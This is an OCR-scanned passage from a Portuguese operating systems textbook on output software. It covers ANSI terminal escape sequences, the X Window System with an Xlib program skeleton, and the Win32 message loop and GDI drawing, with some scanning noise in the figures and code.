dos mouses responde em um máximo de 40 vezes/s, 


de maneira que o mouse pode ter percorrido múltiplos 
mickeys desde a última resposta. 

Observe que o mouse indica apenas mudanças na po- 
sição, não a posição absoluta em si. Se o mouse for ergui- 
do no ar e colocado de volta suavemente sem provocar 
um giro na bola, nenhuma mensagem será enviada. 

Muitas interfaces gráficas fazem distinções entre cli- 
ques simples e duplos de um botão de mouse. Se dois cli- 
ques estiverem próximos o suficiente no espaço (mickeys) 
e também próximos o suficiente no tempo (milissegun- 
dos), um clique duplo é sinalizado. Cabe ao software de- 
finir “próximo o suficiente”, com ambos os parâmetros 
normalmente sendo estabelecidos pelo usuário. 


5.6.2 Software de saída 


Agora vamos considerar o software de saída. Primei- 
ro examinaremos uma saída simples para uma janela de 
texto, que é o que os programadores em geral preferem 
usar. Então consideraremos interfaces do usuário gráfi- 
cas, que outros usuários muitas vezes preferem. 


Janelas de texto 


A saída é mais simples do que a entrada quando a sa- 
ida está sequencialmente em uma única fonte, tamanho 
e cor. Na maioria das vezes, o programa envia caracteres 
para a janela atual e eles são exibidos ali. Normalmente, 
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um bloco de caracteres, por exemplo, uma linha, é escri- 
to em uma chamada de sistema. 

Editores de tela e muitos outros programas sofistica- 
dos precisam ser capazes de atualizar a tela de maneiras 
complexas, como substituindo uma linha no meio da tela. 
Para acomodar essa necessidade, a maioria dos drivers 
de saída suporta uma série de comandos para mover o 
cursor, inserir e deletar caracteres ou linhas no cursor, e 
assim por diante. Esses comandos são muitas vezes cha- 
mados de sequências de escape. No auge do terminal 
burro ASCII 25 x 80, havia centenas de tipos de termi- 
nais, cada um com suas próprias sequências de escape. 
Como consequência, era difícil de escrever um software 
que funcionasse em mais de um tipo de terminal. 

Uma solução, introduzida no UNIX de Berkeley, foi 
um banco de dados terminal chamado de termcap. Esse 
pacote de software definiu uma série de ações básicas, 
como mover o cursor para uma coordenada (linha, co- 
luna). Para mover o cursor para um ponto em parti- 
cular, o software — digamos, um editor — usava uma 
sequência de escape genérica que era então convertida 
para a sequência de escape real para o terminal que esta- 
va sendo escrito. Dessa maneira, o editor trabalhava em 
qualquer terminal que tivesse uma entrada no banco de 
dados termcap. Grande parte do software UNIX ainda 
funciona desse jeito, mesmo em computadores pessoais. 

Por fim, a indústria viu a necessidade de padronizar 
a sequência de escape, então foi desenvolvido o padrão 
ANSI. Alguns dos valores são mostrados na Figura 5.32. 


(eU TEEI Sequência de escapes ANSI aceita pelo driver do terminal na saída. ESC representa o caractere de escape ASCII (0x1B), 


en, me ssão parâmetros numéricos opcionais. 





















































Sequência de escape Significado 
ESC [nA Mover n linhas para cima 
ESC [nB Mover n linhas para baixo 
ESC [nC Mover n espaços para a direita 
ESC [nD Mover n espaços para a esquerda 
ESC [m ; nH Mover o cursor para (m,n) 
ESC [sJ Limpar a tela a partir do cursor (O até o final, 1 a partir do início, 2 para ambos) 
ESC [sK Limpar a linha a partir do cursor (0 até o final, 1 a partir do inicio, 2 para ambos) 
ESC [nL Inserir n linhas a partir do cursor 
ESC [nM Excluir n linhas a partir do cursor 
ESC [nP Excluir n caracteres a partir do cursor 
ESC [nO Inserir n caracteres a partir do cursor 
ESC [nm Habilitar efeito n (O = normal, 4 = negrito, 5 = piscante, 7 = reverso) 
ESC M Rolar a tela para cima se o cursor estiver na primeira linha 
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Considere como essas sequéncias de escape pode- 
riam ser usadas por um editor de texto. Suponha que o 
usuario digite um comando dizendo ao editor para de- 
letar toda a linha 3 e então reduzir o espaço entre as 
linhas 2 e 4. O editor pode enviar a sequência de escape 
a seguir através da linha serial para o terminal: 


ESC[3;1HESC[OKESC[1M 


(onde os espaços são usados acima somente para separar 
os símbolos; eles não são transmitidos). Essa sequência 
move o cursor para o início da linha 3, apaga a linha 
inteira, e então deleta a linha agora vazia, fazendo que 
todas as linhas começando em 5 sejam movidas uma 
linha acima. Então o que era a linha 4 torna-se a linha 
3; o que era a linha 5 torna-se a linha 4, e assim por 
diante. Sequências de escape análogas podem ser usa- 
das para acrescentar texto ao meio da tela. Palavras 
podem ser acrescentadas ou removidas de uma manei- 
ra similar. 


O sistema X Window 


Quase todos os sistemas UNIX baseiam sua inter- 
face de usuário no Sistema X Window (muitas ve- 
zes chamado simplesmente X), desenvolvido no MIT, 
como parte do projeto Athena na década de 1980. Ele é 
bastante portátil e executa totalmente no espaço do usu- 
ário. Na origem, a ideia era que ele conectasse um gran- 
de número de terminais de usuários remotos com um 
servidor de computadores central, de maneira que ele 
é logicamente dividido em software cliente e software 
hospedeiro, que pode executar em diferentes computa- 
dores. Nos computadores pessoais modernos, ambas as 
partes podem executar na mesma máquina. Nos siste- 
mas Linux, os populares ambientes Gnome e KDE exe- 
cutam sobre o X. 

Quando o X está executando em uma máquina, o 
software que coleta a entrada do teclado e mouse e 
escreve a saída para a tela é chamado de servidor X. 
Ele tem de controlar qual janela está atualmente ativa 
(onde está o ponteiro do mouse), de maneira que ele 
sabe para qual cliente enviar qualquer nova entrada do 
teclado. Ele se comunica com programas em execução 
(possível sobre uma rede) chamados clientes X. Ele 
lhes envia entradas do teclado e mouse e aceita coman- 
dos da tela deles. 

Pode parecer estranho que o servidor X esteja sem- 
pre dentro do computador do usuário enquanto o cliente 
X pode estar fora em um servidor de computador remo- 
to, mas pense apenas no trabalho principal do servidor 


X: exibir bits na tela, então faz sentido estar próximo do 
usuário. Do ponto de vista do programa, trata-se de um 
cliente dizendo ao servidor para fazer coisas, como exi- 
bir texto e figuras geométricas. O servidor (no PC local) 
apenas faz o que lhe disseram para fazer, como fazem 
todos os servidores. 

O arranjo do cliente e servidor é mostrado na Fi- 
gura 5.33 para o caso em que o cliente X e o servidor 
X estão em máquinas diferentes. Mas quando executa 
Gnome ou KDE em uma única máquina, o cliente é ape- 
nas algum programa de aplicação usando a biblioteca 
X falando com o servidor X na mesma máquina (mas 
usando uma conexão TCP através de soquetes, a mesma 
que ele usaria no caso remoto). 

A razão de ser possível executar o sistema X Win- 
dow no UNIX (ou outro sistema operacional) em uma 
única máquina ou através de uma rede é o fato de que o 
que o X realmente define é o protocolo X entre o cliente 
X e o servidor X, como mostrado na Figura 5.33. Não 
importa se o cliente e o servidor estão na mesma máqui- 
na, separados por 100 metros sobre uma rede de área 
local, ou distantes milhares de quilômetros um do outro 
e conectados pela internet. O protocolo e a operação do 
sistema são idênticos em todos os casos. 

O X é apenas um sistema de gerenciamento de jane- 
las. Ele não é uma GUI completa. Para obter uma GUI 
completa, outras camadas de software são executadas 
sobre ele. Uma camada é a Xlib, um conjunto de rotinas 
de biblioteca para acessar a funcionalidade do X. Essas 
rotinas formam a base do Sistema X Window e serão 
examinadas a seguir, embora sejam primitivas demais 
para a maioria dos programas de usuário acessar dire- 
tamente. Por exemplo, cada clique de mouse é relatado 
em separado, então determinar que dois cliques real- 
mente formem um clique duplo deve ser algo tratado 
acima da Xlib. 

Para tornar a programação com X mais fácil, um 
toolkit consistindo em Intrinsics é fornecido como par- 
te do X. Essa camada gerencia botões, barras de ro- 
lagem e outros elementos da GUI chamados widgets. 
Para produzir uma verdadeira interface GUI, com apa- 
rência e sensação uniformes, outra camada é necessária 
(ou várias delas). Um exemplo é o Motif, mostrado na 
Figura 5.33, que é a base do Common Desktop Environ- 
ment (Ambiente de Desktop Comum) usado no Solaris e 
outros sistemas UNIX comerciais. A maioria das aplica- 
ções faz uso de chamadas para o Motif em vez da Xlib. 
Gnome e KDE têm uma estrutura similar à da Figura 
5.33, apenas com bibliotecas diferentes. Gnome usa a 
biblioteca GTK+ e KDE usa a biblioteca Qt. A questão 
sobre ser melhor ter duas GUIs ou uma é discutível. 


alee) T EEE] Clientes e servidores no sistema X Window do MIT. 
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Também vale a pena observar que o gerenciamento 
de janela não é parte do X em si. A decisão de deixá-lo 
de fora foi absolutamente intencional. Em vez disso, um 
processo de cliente X separado, chamado de gerencia- 
dor de janela, controla a criação, remoção e movimento 
das janelas na tela. Para gerenciar as janelas, ele envia 
comandos para o servidor X dizendo-lhe o que fazer. Ele 
muitas vezes executa na mesma máquina que o cliente X, 
mas na teoria pode executar em qualquer lugar. 

Esse design modular, consistindo em diversas cama- 
das e múltiplos programas, torna o X altamente portátil 
e flexível. Ele tem sido levado para a maioria das ver- 
sões do UNIX, incluindo Solaris, todas as variantes do 
BSD, AIX, Linux e assim por diante, tornando possível 
aos que desenvolvem aplicações ter uma interface do 
usuário padrão para múltiplas plataformas. Ele também 
foi levado para outros sistemas operacionais. Em com- 
paração, no Windows, os sistemas GUI e de gerencia- 
mento de janelas estão misturados na GDI e localizados 
no núcleo, o que dificulta a sua manutenção e, é claro, 
torna-os não portáteis. 

Agora examinemos brevemente o X como visto do 
nível Xlib. Quando um programa X inicializa, ele abre 
uma conexão para um ou mais servidores X — vamos 
chamá-los de estações de trabalho (workstations), em- 
bora possam ser colocados na mesma máquina que o 
próprio programa X. Este considera a conexão confiá- 
vel no sentido de que mensagens perdidas e duplicadas 
são tratadas pelo software de rede e ele não tem de se 


preocupar com erros de comunicação. Em geral, TCP/ 
IP é usado entre o cliente e o servidor. 
Quatro tipos de mensagens trafegam pela conexão: 


1. Comandos gráficos do programa para a estação 
de trabalho. 

2. Respostas da estação de trabalho a perguntas do 
programa. 

3. Teclado, mouse e outros avisos de eventos. 

4. Mensagens de erro. 


A maioria dos comandos gráficos é enviada do progra- 
ma para a estação de trabalho como mensagens de uma só 
via. Não é esperada uma resposta. A razão para esse design 
é que, quando os processos do cliente e do servidor estão 
em máquinas diferentes, pode ser necessário um período 
de tempo substancial para o comando chegar ao servidor e 
ser executado. Bloquear o programa de aplicação durante 
esse tempo o atrasaria desnecessariamente. Por outro lado, 
quando o programa precisa de informações da estação de 
trabalho, basta-lhe esperar até que a resposta retorne. 

Como o Windows, X é altamente impelido por even- 
tos. Eventos fluem da estação de trabalho para o pro- 
grama, em geral como resposta a alguma ação humana 
como teclas digitadas, movimentos do mouse, ou uma 
janela sendo aberta. Cada mensagem de evento tem 
32 bytes, com o primeiro byte fornecendo o tipo do 
evento e os 31 bytes seguintes fornecendo informações 
adicionais. Várias dúzias de tipos de eventos existem, 
mas a um programa é enviado somente aqueles eventos 
que ele disse que está disposto a manejar. Por exemplo, 
se um programa não quer ouvir falar de liberação de 
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teclas, ele não recebe quaisquer eventos relacionados 
ao assunto. Como no Windows, os eventos entram em 
filas, e os programas leem os eventos da fila de entrada. 
No entanto, diferentemente do Windows, o sistema ope- 
racional jamais chama sozinho rotinas dentro do pro- 
grama de aplicação por si próprio. Ele não faz nem ideia 
de qual rotina lida com qual evento. 

Um conceito fundamental em X é o recurso (re- 
source). Um recurso é uma estrutura de dados que con- 
tém determinadas informações. Programas de aplicação 
criam recursos em estações de trabalho. Recursos po- 
dem ser compartilhados entre múltiplos processos na 
estação de trabalho. Eles tendem a ter vidas curtas e não 
sobrevivem às reinicializações das estações de trabalho. 
Recursos típicos incluem janelas, fontes, mapas de co- 
res (paletas de cores), pixmaps (mapas de bits), cursores 
e contextos gráficos. Os últimos são usados para asso- 
ciar propriedades às janelas e são similares em conceito 
com os contextos de dispositivos no Windows. 

Um esqueleto incompleto, aproximado, de um progra- 
ma X é mostrado na Figura 5.34. Ele começa incluindo al- 
guns cabeçalhos obrigatórios e então declarando algumas 
variáveis. Ele então conecta ao servidor X especificado 
como o parâmetro para XOpenDisplay. Então aloca um 
recurso de janela e armazena um descritor para ela em win. 


eN T LO Um esqueleto de um programa de aplicação X Window. 


include <X11/Xlib.h> 
include <X11/Xutil.h> 


main(int argc, char *argv[]) 
{ 
Display disp; 
Window win; 
GC gc; 
XEvent event; 
int running = 1; 


disp = XOpenDisplay("display name"); 
win = XCreateSimpleWindows (disp, ...); 
XSetStandardProperties(disp, ...); 

gc = XCreateGC(disp, win, 0, 0); 


Na prática, alguma inicialização aconteceria aqui. Após 
isso, ele diz ao gerenciador da janela que a janela nova 
existe, assim o gerenciador da janela pode gerenciá-la. 

A chamada para XCreateGC cria um contexto gráfico 
no qual as propriedades da janela são armazenadas. Em 
um programa mais completo, elas podem ser inicializa- 
das aqui. A instrução seguinte, a chamada XSelectinput, 
diz ao servidor X com quais eventos o programa está 
preparado para lidar. Nesse caso, ele está interessado em 
cliques do mouse, teclas digitadas e janelas sendo aber- 
tas. Na prática, um programa real estaria interessado em 
outros eventos também. Por fim, a chamada XMapRaised 
mapeia a janela nova na tela como a janela mais acima. 
Nesse ponto, a janela torna-se visível na tela. 

O laço principal consiste em dois comandos e é lo- 
gicamente muito mais simples do que o laço corres- 
pondente no Windows. O primeiro comando obtém um 
evento e o segundo ativa um processamento de acordo 
com o tipo do evento. Quando algum evento indica que 
o programa foi concluído, running é colocado em 0 e o 
laço termina. Antes de sair, o programa libera o contex- 
to gráfico, janela e conexão. 

Vale a pena mencionar que nem todas as pessoas gos- 
tam da GUI. Muitos programadores preferem uma in- 
terface orientada por linha de comando do tipo discutida 


/* identificador do servidor */ 

/* identificador da janela */ 

/* identificador do contexto grafico */ 
/* armazenamento para um evento */ 


/* conecta ao servidor X */ 

/* aloca memoria para a nova janela */ 

/* anuncia a nova janela para o gerenciador de janelas */ 
/* cria contexto grafico */ 


XSelectInput(disp, win, ButtonPressMark | KeyPressMask | ExposureMask); 


XMapRaised(disp, win); 


while (r unning) { 
xNextEvent(disp, &event); 
switch (event.type) { 


case Expose: ..) break; 
case ButtonPress: ...; break; 
case Keypress: a; break; 


} 


XFreeGC(disp, gc); 
XDestroyWindow(disp, win); 
XCloseDisplay(disp); 


/*mostra a janela; envia evento de exposicao de janela */ 


/*obtem proximo evento */ 


/* repinta janela */ 
/* processa clique do mouse */ 
/* processa entrada do teclado */ 


/* libera contexto grafico */ 
/* desaloca espaco de memoria da janela */ 
/* termina a conexao de rede */ 


na Seção 5.6.1. O X trata essa questão mediante um pro- 
grama cliente chamado xterm, que emula um venerá- 
vel terminal inteligente VT102, completo com todas as 
sequências de escape. Desse modo, editores como vi e 
emacs (e outros softwares que usam termcap) trabalham 
nessas janelas sem modificação. 


Interfaces gráficas do usuário 


A maioria dos computadores pessoais oferece uma 
interface gráfica do usuário (Graphical User Interface 
— GUI). O acrônimo GUI é pronunciado “gooey”. 

A GUI foi inventada por Douglas Engelbart e seu 
grupo de pesquisa no Instituto de Pesquisa Stanford. Ela 
foi então copiada por pesquisadores na Xerox PARC. 
Um belo dia, Steve Jobs, cofundador da Apple, estava 
visitando a PARC e viu uma GUI em um computador 
da Xerox e disse algo como “Meu Deus, esse é o futuro 
da computação”. A GUI deu a ele a ideia para um novo 
computador, que se tornou o Apple Lisa. O Lisa era caro 
demais e foi um fracasso comercial, mas seu sucessor, O 
Macintosh, foi um sucesso enorme. 

Quando a Microsoft conseguiu um protótipo Macin- 
tosh para que pudesse desenvolver o Microsoft Office 
nele, a empresa implorou à Apple para que licenciasse a 
interface para todos os interessados, de maneira que ela 
tornar-se-ia o novo padrão da indústria. (A Microsoft 
ganhou muito mais dinheiro com o Office do que com o 
MS-DOS, então ela estava disposta a abandonar o MS- 
-DOS para ter uma plataforma melhor para o Office.) 
O executivo da Apple responsável pelo Macintosh, Jean- 
-Louis Gassée, recusou a oferta e Steve Jobs não esta- 
va mais por perto para confrontar a decisão. Por fim, 
a Microsoft conseguiu uma licença para elementos da 
interface. Isso formou a base do Windows. Quando o 
Windows começou a pegar, a Apple processou a Mi- 
crosoft, alegando que a empresa havia excedido a licen- 
ça, mas o juiz discordou e o Windows prosseguiu para 
desbancar o Macintosh. Se Gassée tivesse concordado 
com as muitas pessoas dentro da Apple que também 
queriam licenciar o software Macintosh para qualquer 
um, a Apple teria ficado insanamente rica em taxas de 
licenciamento e o Windows não existiria hoje em dia. 

Deixando de lado as interfaces sensíveis ao toque 
por ora, a GUI tem quatro elementos essenciais, deno- 
tados pelos caracteres WIMP. Essas letras representam 
Windows, Icons, Menus e Pointing device (Janelas, 
Ícones, Menus e Dispositivo apontador, respectiva- 
mente). As janelas são blocos retangulares de área de 
tela usados para executar programas. Os ícones são 
pequenos símbolos que podem ser clicados para fazer 


Capítulo 5 ENTRADA/SAÍDA | 281 


que determinada ação aconteça. Os menus são listas de 
ações das quais uma pode ser escolhida. Por fim, um 
dispositivo apontador é um mouse, trackball, ou outro 
dispositivo de hardware usado para mover um cursor 
pela tela para selecionar itens. 

O software GUI pode ser implementado como códi- 
go no nível do usuário, como nos sistemas UNIX, ou no 
próprio sistema operacional, como no caso do Windows. 

A entrada de dados para sistemas GUI ainda usa o te- 
clado e o mouse, mas a saída quase sempre vai para um 
dispositivo de hardware especial chamado adaptador 
gráfico. Um adaptador gráfico contém uma memória 
especial chamada RAM de vídeo que armazena as ima- 
gens que aparecem na tela. Adaptadores gráficos muitas 
vezes têm poderosas CPUs de 32 ou 64 bits e até 4 GB 
de sua própria RAM, separada da memória principal do 
computador. 

Cada adaptador gráfico suporta um determinado 
número de tamanhos de telas. Tamanhos comuns (ho- 
rizontal x vertical em pixels) são 1280 x 960, 1600 x 
1200, 1920 x 1080, 2560 x 1600, e 3840 x 2160. Muitas 
resoluções na prática encontram-se na proporção 4:3, 
que se ajusta à proporção de perspectiva dos aparelhos 
de televisão NTSC e PAL e desse modo fornece pixels 
quadrados nos mesmos monitores usados para os apa- 
relhos de televisão. Resoluções mais altas são voltadas 
para os monitores widescreen cuja proporção de pers- 
pectiva casa com elas. A uma resolução de apenas 1920 
x 1080 (o tamanho dos vídeos HD inteiros), uma tela 
colorida com 24 bits por pixel exige em torno de 6,2 
MB de RAM apenas para conter a imagem, então com 
256 MB ou mais, o adaptador gráfico pode conter mui- 
tas imagens ao mesmo tempo. Se a tela inteira for reno- 
vada 75 vezes/s, a RAM de vídeo tem de ser capaz de 
fornecer dados continuamente a 445 MB/s. 

O software de saída para GUIs é um tópico extenso. 
Muitos livros de 1500 páginas foram escritos somente 
sobre o GUI Windows (por exemplo, PETZOLD, 2013; 
RECTOR e NEWCOMER, 1997; e SIMON, 1997). 
Claro, nesta seção, podemos apenas arranhar a superfi- 
cie e apresentar alguns dos conceitos subjacentes. Para 
tornar a discussão concreta, descreveremos o Win32 
API, que é aceito por todas as versões de 32 bits do 
Windows. O software de saída para outras GUIs é de 
certa forma comparável em um sentido geral, mas os 
detalhes são muito diferentes. 

O item básico na tela é uma área retangular chamada 
de janela. A posição e o tamanho de uma janela são 
determinados exclusivamente por meio das coordena- 
das (em pixels) de dois vértices diagonalmente opostos. 
Uma janela pode conter uma barra de título, uma barra 
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de menu, uma barra de ferramentas, uma barra de rola- 
gem vertical e uma barra de rolagem horizontal. Uma 
janela típica é mostrada na Figura 5.35. Observe que o 
sistema de coordenadas do Windows coloca a origem 
no vértice superior esquerdo e estabelece que o y au- 
menta para baixo, o que é diferente das coordenadas 
cartesianas usadas na matemática. 

Quando uma janela é criada, os parâmetros especifi- 
cam se ela pode ser movida, redimensionada ou rolada 
(arrastando a trava deslizante da barra de rolagem) pelo 
usuário. A principal janela produzida pela maioria dos 
programas pode ser movida, redimensionada e rolada, o 
que tem enormes consequências para a maneira como os 
programas do Windows são escritos. Em particular, os 
programas precisam ser informados a respeito de mudan- 
ças no tamanho de suas janelas e devem estar preparados 
para redesenhar os conteúdos de suas janelas a qualquer 
momento, mesmo quando menos esperarem por isso. 

Como consequência, os programas do Windows são 
orientados a mensagens. As ações do usuário envolven- 
do o teclado ou o mouse são capturadas pelo Windows e 
convertidas em mensagens para o programa proprietário 
da janela sendo endereçada. Cada programa tem uma fila 
de mensagens para a qual as mensagens relacionadas a 
todas as suas janelas são enviadas. O principal laço do 
programa consiste em pescar a próxima mensagem e 


processá-la chamando uma rotina interna para aquele 
tipo de mensagem. Em alguns casos, o próprio Windows 
pode chamar essas rotinas diretamente, ignorando a fila 
de mensagens. Esse modelo é bastante diferente do códi- 
go procedimental do modelo UNIX que faz chamadas de 
sistema para interagir com o sistema operacional. X, no 
entanto, é orientado a eventos. 

A fim de tornar esse modelo de programação mais 
claro, considere o exemplo da Figura 5.36. Aqui vemos 
o esqueleto de um programa principal para o Windows. 
Ele não está completo e não realiza verificação de erros, 
mas mostra detalhes suficientes para nossos fins. Ele 
começa incluindo um arquivo de cabeçalho, windows.h, 
que contém muitos macros, tipos de dados, constantes, 
protótipos de funções e outras informações necessárias 
pelos programas do Windows. 

O programa principal inicializa com uma declaração 
dando seu nome e parâmetros. A macro WINAPI é uma 
instrução para o compilador usar uma determinada con- 
venção de passagem de parâmetros e não a abordaremos 
mais neste livro. O primeiro parâmetro, h, é o nome da 
instância e é usado para identificar o programa para o resto 
do sistema. Até certo ponto, Win32 é orientado a objetos, 
o que significa que o sistema contém objetos (por exem- 
plo, programas, arquivos e janelas) que têm algum estado 
e código associado, chamados métodos, que operam sobre 
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int WINAPI WinMain(HINSTANCE h, HINSTANCE, hprev, char *szCmd, int iCmdShow) 


/* mensagens que chegam sao aqui armazenadas */ 


/* indica qual procedimento chamar*/ 


/* Texto para a Barra de Titulo */ 
/* carrega icone do programa */ 
/* carrega cursor do mouse */ 


/* obtem mensagem da fila */ 


/* envia msg para o procedimento apropriado */ 


{ 
WNDCLASS wndclass; /* objeto-classe para esta janela*/ 
MSG msg; 
HWND hwnd; /* ponteiro para o objeto janela*/ 
/* Inicializa wndclass */ 
wndclass.|pfnWndProc = WndProc; 
wndclass.lpszClassName = "Program name"; 
wndclass.hlcon = Loadicon(NULL, IDI APPLICATION); 
wndclass.hCursor = LoadCursor(NULL, IDC ARROW); 
RegisterClass(&wndclass); /* avisa o Windows sobre wndclass */ 
hwnd = CreateWindow (...) /* aloca espaco para a janela*/ 
ShowWindow(hwnd, iCmdShow); /* mostra a janela na tela */ 
UpdateWindow(hwnd); /* avisa a janela para pintar-se */ 
while (GetMessage(&msg, NULL, 0, 0)) { 
TranslateMessage(&msg); /* traduz a mensagem*/ 
DispatchMessage(&msg); 
} 
return(msg.wParam); 
} 


long CALLBACK WndProc(HWND hwnd, UINT message, UINT wParam, long IParam) 


/* Declaracoes sao colocadas aqui*/ 


switch (message) { 


case WM_CREATE: . return... 
case WM_PAINT: «> return... 
case WM DESTROY: ...; return... 


; A cria janela */ 
;  /* repinta conteudo da janela */ 
;  /* destroi janela */ 


return(DefWindowProc(hwnd, message, wParam, IParam));/* default */ 


esse estado. Os objetos são referenciados usando nomes, 
e nesse caso A identifica o programa. O segundo parâme- 
tro está presente somente por razões de compatibilidade, 
ele não é mais usado. O terceiro parâmetro, szCmd, é uma 
cadeia terminada em zero contendo a linha de comando 
que começou o programa, mesmo que ele não tenha sido 
iniciado por uma linha de comando. O quarto parâmetro, 
iCmdShow, diz se a janela inicial do programa deve ocupar 
toda a tela, parte ou nada dela (somente a barra de tarefas). 

Essa declaração ilustra uma convenção amplamen- 
te usada pela Microsoft chamada de notação húngara. 
O nome é uma brincadeira com a notação polonesa, o 
sistema pós-fixo inventado pelo lógico polonês J. Luka- 
siewicz para representar fórmulas algébricas sem usar 
precedência ou parênteses. A notação húngara foi inven- 
tada por um programador húngaro na Microsoft, Charles 
Simonyi, e usa os primeiros caracteres de um identifica- 
dor para especificar o tipo. Entre as letras e os tipos per- 
mitidos estão o c (caractere), w (word, agora significando 
um inteiro de 16 bits sem sinal), i (inteiro de 32 bits com 
sinal), / (longo, também um inteiro de 32 bits com sinal), 


s (string, cadeia de caracteres), sz (cadeia de caracteres 
terminada por um byte zero), p (ponteiro), fn (função) e 
h (handle, nome). Desse modo, szCmd é uma cadeia ter- 
minada em zero e iCmdShow é um inteiro, por exemplo. 
Muitos programadores acreditam que codificar o tipo em 
nomes de variáveis dessa maneira tem pouco valor e di- 
ficulta a leitura do código do Windows. Nada análogo a 
essa convenção existe no UNIX. 

Cada janela deve ter um objeto-classe associado que 
define suas propriedades. Na Figura 5.36, esse objeto- 
-classe é wndclass. Um objeto do tipo WNDCLASS tem 
10 campos, quatro dos quais são inicializados na Figura 
5.36. Em um programa real, os outros seis seriam inicia- 
lizados também. O campo mais importante é /pfnWnd- 
Proc, que é um ponteiro longo (isto é, 32 bits) para a 
função que lida com as mensagens direcionadas para 
essa janela. Os outros campos inicializados aqui dizem 
qual nome e ícone usar na barra do título, e qual símbo- 
lo usar para o cursor do mouse. 

Após wndclass ter sido inicializado, RegisterClass é 
chamado para passá-lo para o Windows. Em particular, 
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após essa chamada, o Windows sabe qual rotina chamar 
quando ocorrem vários eventos que não passam pela fila 
de mensagens. A chamada seguinte, CreateWindow, aloca 
memória para a estrutura de dados da janela e retorna um 
nome para referenciar futuramente. O programa faz então 
mais duas chamadas em sequência, para colocar o contor- 
no da janela na tela e por fim preenchê-la por completo. 

Nesse ponto chegamos ao laço principal do progra- 
ma, que consiste em obter uma mensagem, ter determi- 
nadas traduções realizadas para ela e então passá-la de 
volta para o Windows para que ele invoque WndProc 
para processá-la. Respondendo à questão se esse meca- 
nismo todo poderia ter sido mais simples, a resposta é 
sim, mas ele foi feito dessa maneira por razões históri- 
cas e agora estamos presos a ele. 

Seguindo o programa principal é a rotina WndProc, 
que lida com várias mensagens que podem ser enviadas 
para a janela. O uso de CALLBACK aqui, como WINA- 
PI antes, especifica a sequência de chamadas a ser usa- 
da para os parâmetros. O primeiro parâmetro é o nome 
da janela a ser usada. O segundo é o tipo da mensagem. 
O terceiro e quarto parâmetros podem ser usados para 
fornecer informações adicionais quando necessário. 

Os tipos de mensagens WM CREATE e WM DES- 
TROY são enviados no início e final do programa, res- 
pectivamente. Eles dão ao programa a oportunidade, 
por exemplo, de alocar memória para estruturas de da- 
dos e então devolvê-la. 

O terceiro tipo de mensagem, WM PAINT, é uma ins- 
trução para o programa para preencher a janela. Ele não é 
chamado somente quando a janela é desenhada pela pri- 
meira vez, mas muitas vezes durante a execução do pro- 
grama também. Em comparação com os sistemas baseados 
em texto, no Windows um programa não pode presumir 
que qualquer coisa que ele desenhe na tela permanecerá lá 
até sua remoção. Outras janelas podem ser arrastadas para 
cima dessa janela, menus podem ser trazidos e largados so- 
bre ela, caixas de diálogos e pontas de ferramentas podem 
cobrir parte dela, e assim por diante. Quando esses itens 
são removidos, a janela precisa ser redesenhada. A maneira 
que o Windows diz para um programa redesenhar uma ja- 
nela é enviar para ela uma mensagem WM PAINT. Como 
um gesto amigável, ela também fornece informações sobre 
que parte da janela foi sobrescrita, caso seja mais fácil ou 
mais rápido regenerar aquela parte da janela em vez de re- 
desenhar tudo desde o início. 

Há duas maneiras de o Windows conseguir que um 
programa faça algo. Uma é postar uma mensagem para 
sua fila de mensagens. Esse método é usado para a en- 
trada do teclado, entrada do mouse e temporizadores 
que expiraram. A outra maneira, enviar uma mensagem 


para a janela, consiste no Windows chamar diretamente 
o próprio WndProc. Esse método é usado para todos os 
outros eventos. Tendo em vista que o Windows é noti- 
ficado quando uma mensagem é totalmente processada, 
ele pode abster-se de fazer uma nova chamada até que a 
anterior tenha sido concluída. Desse modo as condições 
de corrida são evitadas. 

Há muitos outros tipos de mensagens. Para evitar um 
comportamento errático caso uma mensagem inespera- 
da chegue, o programa deve chamar DefWindowProc ao 
fim do WndProc para deixar o tratador padrão cuidar 
dos outros casos. 

Resumindo, um programa para o Windows normal- 
mente cria uma ou mais janelas com um objeto-classe para 
cada uma. Associado com cada programa há uma fila de 
mensagens e um conjunto de rotinas tratadoras. Em últi- 
ma análise, o comportamento do programa é impelido por 
eventos que chegam, que são processados pelas rotinas tra- 
tadoras. Esse é um modelo do mundo muito diferente da 
visão mais procedimental adotada pelo UNIX. 

A ação de desenhar para a tela é manejada por um 
pacote que consiste em centenas de rotinas que são reu- 
nidas para formar a interface do dispositivo gráfico 
(GDI — Graphics Device Interface). Ela pode lidar 
com texto e gráficos e é projetada para ser independente 
de plataformas e dispositivos. Antes que um programa 
possa desenhar (isto é, pintar) em uma janela, ele pre- 
cisa adquirir um contexto do dispositivo, que é uma 
estrutura de dados interna contendo propriedades da 
janela, como a fonte, cor do texto, cor do segundo pla- 
no, e assim por diante. A maioria das chamadas para a 
GDI usa o contexto de dispositivo, seja para desenhar 
ou para obter ou ajustar as propriedades. 

Existem várias maneiras para adquirir o contexto do 
dispositivo. Um exemplo simples da sua aquisição e uso é 


hdc = GetDC(hwnd); 
TextOut(hdc, x, y, psText, iLength); 
ReleaseDC(hwnd, hdc); 


A primeira instrução obtém um nome para o contexto 
do dispositivo, dc. A segunda usa o contexto do dispo- 
sitivo para escrever uma linha de texto na tela, especifi- 
cando as coordenadas (x, y) de onde começa a cadeia, um 
ponteiro para a cadeia em si e seu comprimento. A tercei- 
ra chamada libera o contexto do dispositivo para indicar 
que o programa terminou de desenhar por ora. Observe 
que hdc é usado de maneira análoga a um descritor de ar- 
quivos UNIX. Observe também que ReleaseDC contém 
informações redundantes (o uso de hdc especifica unica- 
mente uma janela). O uso de informações redundantes 
que não têm valor real é comum no Windows. 


Outra nota interessante é que, quando hdc é adquiri- 
do dessa maneira, o programa pode escrever apenas na 
área do cliente da janela, não na barra de títulos e ou- 
tras partes dela. Internamente, na estrutura de dados do 
contexto do dispositivo, uma região de pintura é manti- 
da. Qualquer desenho fora dessa região é ignorado. No 
entanto, existe outra maneira de adquirir um contexto 
de dispositivo, GetWindowDC, que ajusta a região de 
pintura para toda a janela. Outras chamadas restringem 
a região de pintura de outras maneiras. A existência de 
múltiplas chamadas que fazem praticamente a mesma 
coisa é característica do Windows. 

Um tratamento completo sobre GDI está fora de 
questão aqui. Para o leitor interessado, as referências 
citadas fornecem informações adicionais. Mesmo as- 
sim, dada sua importância, algumas palavras sobre a 
GDI provavelmente valem a pena. A GDI faz várias 
chamadas de rotina para obter e liberar contextos de 
dispositivos, conseguir informações sobre contextos de 
dispositivos, obter e estabelecer atributos de contextos 
de dispositivos (por exemplo, a cor do segundo plano), 
manipular objetos GDI como canetas, pincéis e fontes, 
cada um dos quais com seus próprios atributos. Por fim, 
é claro, há um grande número de chamadas GDI para 
